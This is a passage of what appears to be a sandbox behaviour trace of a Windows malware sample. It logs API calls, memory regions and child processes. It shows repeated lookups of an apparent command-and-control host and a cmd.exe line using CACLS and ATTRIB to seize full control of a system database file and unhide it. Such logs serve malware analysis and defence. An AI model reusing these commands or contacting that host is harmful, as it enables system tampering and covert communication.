(hLibModule=0x76910000) returned 1 [0117.253] LocalFree (hMem=0x214520) returned 0x0 [0117.253] ExitProcess (uExitCode=0x0) Thread: id = 90 os_tid = 0xe54 Thread: id = 93 os_tid = 0xe6c [0116.839] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="statcs.s76.r53.com.ua", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0116.839] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="statcs.s76.r53.com.ua", cchWideChar=21, lpMultiByteStr=0x13f853c, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="statcs.s76.r53.com.ua", lpUsedDefaultChar=0x0) returned 21 [0116.839] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x0, lpMultiByteStr=0x1431fac, cbMultiByte=27, lpWideCharStr=0x199ed38, cchWideChar=2047 | out: lpWideCharStr="Host: statcs.s76.r53.com.ua") returned 27 [0116.839] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="80", cchWideChar=2, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 2 [0116.839] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="80", cchWideChar=2, lpMultiByteStr=0x13ea6fc, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="80", lpUsedDefaultChar=0x0) returned 2 [0116.839] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="statcs.s76.r53.com.ua", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0116.839] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="statcs.s76.r53.com.ua", cchWideChar=21, lpMultiByteStr=0x13f867c, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="statcs.s76.r53.com.ua", lpUsedDefaultChar=0x0) returned 21 [0116.840] getaddrinfo (in: pNodeName="statcs.s76.r53.com.ua", pServiceName="80", pHints=0x199fb8c*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x199fbac | out: ppResult=0x199fbac*=0x0) returned 11001 [0116.909] getaddrinfo (in: pNodeName="statcs.s76.r53.com.ua", pServiceName="80", pHints=0x199fb8c*(ai_flags=0, ai_family=23, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x199fbac | out: ppResult=0x199fbac*=0x0) returned 11001 [0116.910] getnameinfo (in: pSockaddr=0x199fc14, SockaddrLength=0x0, pNodeBuffer=0x1359d4c, NodeBufferSize=0x401, pServiceBuffer=0x1415124, ServiceBufferSize=0x20, Flags=10 | out: pNodeBuffer="", pServiceBuffer="C") returned 10047 [0116.910] htons (hostshort=0x0) returned 0x0 [0116.910] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x0, cbMultiByte=0, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 0 [0116.910] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x0, cbMultiByte=0, lpWideCharStr=0x407d24, cchWideChar=0 | out: lpWideCharStr="") returned 0 [0116.910] GetCurrentThreadId () returned 0xe6c [0116.910] GetCurrentThreadId () returned 0xe6c [0116.910] GetCurrentThreadId () returned 0xe6c [0116.910] GetCurrentThreadId () returned 0xe6c [0116.910] GetCurrentThreadId () returned 0xe6c [0116.910] GetCurrentThreadId () returned 0xe6c [0116.910] GetCurrentThreadId () returned 0xe6c [0116.910] GetCurrentThreadId () returned 0xe6c [0116.910] GetCurrentThreadId () returned 0xe6c [0116.910] GetCurrentThreadId () returned 0xe6c [0116.910] GetCurrentThreadId () returned 0xe6c [0116.910] GetCurrentThreadId () returned 0xe6c [0116.910] SetEvent (hEvent=0x84) returned 1 [0116.910] GetCurrentThreadId () returned 0xe6c [0116.910] GetCurrentThreadId () returned 0xe6c [0116.910] GetCurrentThreadId () returned 0xe6c [0116.910] CloseHandle (hObject=0xb8) returned 1 [0116.910] RtlExitUserThread (Status=0x0) Thread: id = 97 os_tid = 0xe84 [0117.075] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="statcs.s76.r53.com.ua", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0117.075] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="statcs.s76.r53.com.ua", cchWideChar=21, lpMultiByteStr=0x13f867c, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="statcs.s76.r53.com.ua", lpUsedDefaultChar=0x0) returned 21 [0117.075] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x0, lpMultiByteStr=0x1431fac, cbMultiByte=27, lpWideCharStr=0x199ed38, cchWideChar=2047 | out: lpWideCharStr="Host: statcs.s76.r53.com.ua") returned 27 [0117.075] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="80", cchWideChar=2, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 2 [0117.075] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="80", cchWideChar=2, lpMultiByteStr=0x13ea6cc, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="80", lpUsedDefaultChar=0x0) returned 2 [0117.075] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="statcs.s76.r53.com.ua", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0117.075] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="statcs.s76.r53.com.ua", cchWideChar=21, lpMultiByteStr=0x13f8514, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="statcs.s76.r53.com.ua", lpUsedDefaultChar=0x0) returned 21 [0117.075] getaddrinfo (in: pNodeName="statcs.s76.r53.com.ua", pServiceName="80", pHints=0x199fb8c*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x199fbac | out: ppResult=0x199fbac*=0x0) returned 11001 [0117.148] getaddrinfo (in: pNodeName="statcs.s76.r53.com.ua", pServiceName="80", pHints=0x199fb8c*(ai_flags=0, ai_family=23, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x199fbac | out: ppResult=0x199fbac*=0x0) returned 11001 [0117.149] getnameinfo (in: pSockaddr=0x199fc14, SockaddrLength=0x0, pNodeBuffer=0x135184c, NodeBufferSize=0x401, pServiceBuffer=0x141515c, ServiceBufferSize=0x20, Flags=10 | out: pNodeBuffer="s", pServiceBuffer="") returned 10047 [0117.149] htons (hostshort=0x0) returned 0x0 [0117.149] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x0, cbMultiByte=0, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 0 [0117.149] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x0, cbMultiByte=0, lpWideCharStr=0x407d24, cchWideChar=0 | out: lpWideCharStr="") returned 0 [0117.149] GetCurrentThreadId () returned 0xe84 [0117.149] GetCurrentThreadId () returned 0xe84 [0117.149] GetCurrentThreadId () returned 0xe84 [0117.149] GetCurrentThreadId () returned 0xe84 [0117.149] GetCurrentThreadId () returned 0xe84 [0117.149] GetCurrentThreadId () returned 0xe84 [0117.149] GetCurrentThreadId () returned 0xe84 [0117.149] GetCurrentThreadId () returned 0xe84 [0117.149] GetCurrentThreadId () returned 0xe84 [0117.149] GetCurrentThreadId () returned 0xe84 [0117.149] GetCurrentThreadId () returned 0xe84 [0117.149] GetCurrentThreadId () returned 0xe84 [0117.149] SetEvent (hEvent=0x84) returned 1 [0117.149] GetCurrentThreadId () returned 0xe84 [0117.149] GetCurrentThreadId () returned 0xe84 [0117.149] GetCurrentThreadId () returned 0xe84 [0117.149] CloseHandle (hObject=0x118) returned 1 [0117.149] RtlExitUserThread (Status=0x0) Process: id = "51" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea168e0" os_pid = "0xdfc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 7940 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 7941 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 7942 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 7943 start_va = 0x150000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 7944 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 7945 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7946 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 7947 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 7948 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 7949 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 8577 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 8578 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 8579 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 8580 start_va = 0x360000 end_va = 0x45ffff entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 8581 start_va = 0x5c0000 end_va = 0x5cffff entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 8582 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 8583 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 8584 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 8585 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 8586 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 8587 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 8588 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 8589 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 8590 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 8591 start_va = 0x250000 end_va = 0x317fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 8592 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 8593 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 8594 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 8595 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 8596 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 8597 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 8598 start_va = 0x460000 end_va = 0x560fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 8599 start_va = 0x5d0000 end_va = 0x11cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005d0000" filename = "" Region: id = 8600 start_va = 0x11d0000 end_va = 0x1332fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011d0000" filename = "" Region: id = 8614 start_va = 0x1340000 end_va = 0x160efff entry_point = 0x1340000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 81 os_tid = 0xe00 [0117.050] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x24fe5c | out: lpSystemTimeAsFileTime=0x24fe5c*(dwLowDateTime=0x83133600, dwHighDateTime=0x1d440a9)) [0117.050] GetCurrentProcessId () returned 0xdfc [0117.050] GetCurrentThreadId () returned 0xe00 [0117.050] GetTickCount () returned 0x27c40 [0117.050] QueryPerformanceCounter (in: lpPerformanceCount=0x24fe54 | out: lpPerformanceCount=0x24fe54*=17383940624) returned 1 [0117.051] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0117.051] __set_app_type (_Type=0x1) [0117.051] __p__fmode () returned 0x76b331f4 [0117.051] __p__commode () returned 0x76b331fc [0117.051] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0117.051] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0117.051] GetCurrentThreadId () returned 0xe00 [0117.051] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xe00) returned 0x38 [0117.051] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0117.051] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0117.051] SetThreadUILanguage (LangId=0x0) returned 0x409 [0117.051] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0117.051] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x24fdec | out: phkResult=0x24fdec*=0x0) returned 0x2 [0117.052] VirtualQuery (in: lpAddress=0x24fe23, lpBuffer=0x24fdbc, dwLength=0x1c | out: lpBuffer=0x24fdbc*(BaseAddress=0x24f000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0117.052] VirtualQuery (in: lpAddress=0x150000, lpBuffer=0x24fdbc, dwLength=0x1c | out: lpBuffer=0x24fdbc*(BaseAddress=0x150000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0117.052] VirtualQuery (in: lpAddress=0x151000, lpBuffer=0x24fdbc, dwLength=0x1c | out: lpBuffer=0x24fdbc*(BaseAddress=0x151000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0117.052] VirtualQuery (in: lpAddress=0x153000, lpBuffer=0x24fdbc, dwLength=0x1c | out: lpBuffer=0x24fdbc*(BaseAddress=0x153000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0117.052] VirtualQuery (in: lpAddress=0x250000, lpBuffer=0x24fdbc, dwLength=0x1c | out: lpBuffer=0x24fdbc*(BaseAddress=0x250000, AllocationBase=0x250000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0117.052] GetConsoleOutputCP () returned 0x1b5 [0117.052] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0117.052] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0117.052] _get_osfhandle (_FileHandle=1) returned 0x7 [0117.052] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0117.052] _get_osfhandle (_FileHandle=1) returned 0x7 [0117.052] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0117.052] _get_osfhandle (_FileHandle=1) returned 0x7 [0117.052] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0117.053] _get_osfhandle (_FileHandle=0) returned 0x3 [0117.053] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0117.053] _get_osfhandle (_FileHandle=0) returned 0x3 [0117.053] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0117.053] GetEnvironmentStringsW () returned 0x370270* [0117.053] FreeEnvironmentStringsW (penv=0x370270) returned 1 [0117.053] GetEnvironmentStringsW () returned 0x370270* [0117.053] FreeEnvironmentStringsW (penv=0x370270) returned 1 [0117.053] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x24ed5c | out: phkResult=0x24ed5c*=0x40) returned 0x0 [0117.054] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x24ed64, lpData=0x24ed68, lpcbData=0x24ed60*=0x1000 | out: lpType=0x24ed64*=0x0, lpData=0x24ed68*=0x0, lpcbData=0x24ed60*=0x1000) returned 0x2 [0117.054] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x24ed64, lpData=0x24ed68, lpcbData=0x24ed60*=0x1000 | out: lpType=0x24ed64*=0x4, lpData=0x24ed68*=0x1, lpcbData=0x24ed60*=0x4) returned 0x0 [0117.054] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x24ed64, lpData=0x24ed68, lpcbData=0x24ed60*=0x1000 | out: lpType=0x24ed64*=0x0, lpData=0x24ed68*=0x1, lpcbData=0x24ed60*=0x1000) returned 0x2 [0117.054] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x24ed64, lpData=0x24ed68, lpcbData=0x24ed60*=0x1000 | out: lpType=0x24ed64*=0x4, lpData=0x24ed68*=0x0, lpcbData=0x24ed60*=0x4) returned 0x0 [0117.054] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x24ed64, lpData=0x24ed68, lpcbData=0x24ed60*=0x1000 | out: lpType=0x24ed64*=0x4, lpData=0x24ed68*=0x40, lpcbData=0x24ed60*=0x4) returned 0x0 [0117.054] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x24ed64, lpData=0x24ed68, lpcbData=0x24ed60*=0x1000 | out: lpType=0x24ed64*=0x4, lpData=0x24ed68*=0x40, lpcbData=0x24ed60*=0x4) returned 0x0 [0117.054] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x24ed64, lpData=0x24ed68, lpcbData=0x24ed60*=0x1000 | out: lpType=0x24ed64*=0x0, lpData=0x24ed68*=0x40, lpcbData=0x24ed60*=0x1000) returned 0x2 [0117.054] RegCloseKey (hKey=0x40) returned 0x0 [0117.054] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x24ed5c | out: phkResult=0x24ed5c*=0x40) returned 0x0 [0117.054] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x24ed64, lpData=0x24ed68, lpcbData=0x24ed60*=0x1000 | out: lpType=0x24ed64*=0x0, lpData=0x24ed68*=0x40, lpcbData=0x24ed60*=0x1000) returned 0x2 [0117.054] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x24ed64, lpData=0x24ed68, lpcbData=0x24ed60*=0x1000 | out: lpType=0x24ed64*=0x4, lpData=0x24ed68*=0x1, lpcbData=0x24ed60*=0x4) returned 0x0 [0117.054] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x24ed64, lpData=0x24ed68, lpcbData=0x24ed60*=0x1000 | out: lpType=0x24ed64*=0x0, lpData=0x24ed68*=0x1, lpcbData=0x24ed60*=0x1000) returned 0x2 [0117.054] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x24ed64, lpData=0x24ed68, lpcbData=0x24ed60*=0x1000 | out: lpType=0x24ed64*=0x4, lpData=0x24ed68*=0x0, lpcbData=0x24ed60*=0x4) returned 0x0 [0117.054] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x24ed64, lpData=0x24ed68, lpcbData=0x24ed60*=0x1000 | out: lpType=0x24ed64*=0x4, lpData=0x24ed68*=0x9, lpcbData=0x24ed60*=0x4) returned 0x0 [0117.054] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x24ed64, lpData=0x24ed68, lpcbData=0x24ed60*=0x1000 | out: lpType=0x24ed64*=0x4, lpData=0x24ed68*=0x9, lpcbData=0x24ed60*=0x4) returned 0x0 [0117.054] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x24ed64, lpData=0x24ed68, lpcbData=0x24ed60*=0x1000 | out: lpType=0x24ed64*=0x0, lpData=0x24ed68*=0x9, lpcbData=0x24ed60*=0x1000) returned 0x2 [0117.054] RegCloseKey (hKey=0x40) returned 0x0 [0117.054] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88635d [0117.054] srand (_Seed=0x5b88635d) [0117.054] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\"" [0117.054] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\"" [0117.055] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0117.055] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3719d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0117.055] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0117.055] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0117.055] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0117.055] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0117.055] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0117.055] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0117.055] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0117.055] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0117.055] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0117.055] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0117.055] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0117.055] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0117.055] GetEnvironmentStringsW () returned 0x3723c0* [0117.056] FreeEnvironmentStringsW (penv=0x3723c0) returned 1 [0117.056] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0117.056] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0117.056] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0117.056] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0117.056] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0117.056] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0117.056] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0117.056] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0117.056] _wcsicmp 